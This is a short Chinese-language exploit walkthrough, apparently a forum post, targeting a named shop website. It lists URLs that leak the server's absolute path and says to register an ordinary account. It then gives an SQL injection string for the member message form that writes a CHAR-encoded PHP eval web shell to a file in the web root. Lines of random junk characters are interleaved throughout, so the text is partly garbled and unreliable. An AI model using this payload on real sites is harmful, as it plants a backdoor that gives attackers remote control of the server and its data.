第一个:想办法找到目标网站的绝对路径
4 L4 G4 }7 r) p5 {# |, ?
0 n+ v$ Y, v) F) `1 G" v2 q# Z- Thttp://www.political-security.com/install/svinfo.php?phpinfo=true! X7 x9 q4 ?! |( H& N
5 I( v! M5 Y5 [7 {! Y8 T, k$ I; ?+ x0 G
http:/www.political-security.com/core/api/shop_api.php
( y2 ^% s9 E: C/ e+ Z \3 H$ _! N. d1 x
http://www.political-security.co ... api_b2b_2_0_cat.php. x9 R" _. C3 o; D
( r( M4 y: ~2 \. y3 t3 H% d+ |
http://www.political-security.com/core/ap ... b_2_0_goodstype.php
* u" z( z0 l. C0 o) v- e3 q, @2 x( C5 U% r; O
http://www.political-security.co ... i_b2b_2_0_brand.php+ {6 Y) ? }) C" x
第二个:注册一个普通用户' g# F7 M7 K: X1 D+ h4 y/ c
# `; e$ j, v) f: U, i
http://www.political-security.com/?passport-signup.html
# K6 W1 @7 k) K+ D7 O) _1 z& R; T7 Z$ [ U V. G7 J
第三个: 发送消息
, _- I' ]8 `$ i! L- C3 @* _0 _2 o$ m1 Y3 z S' C7 E
http://www.political-security.com/?member-send.html
- ]& H' B) `- Q. w0 j发送给中填写/ b) H8 ~1 V" j' u) q. r
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |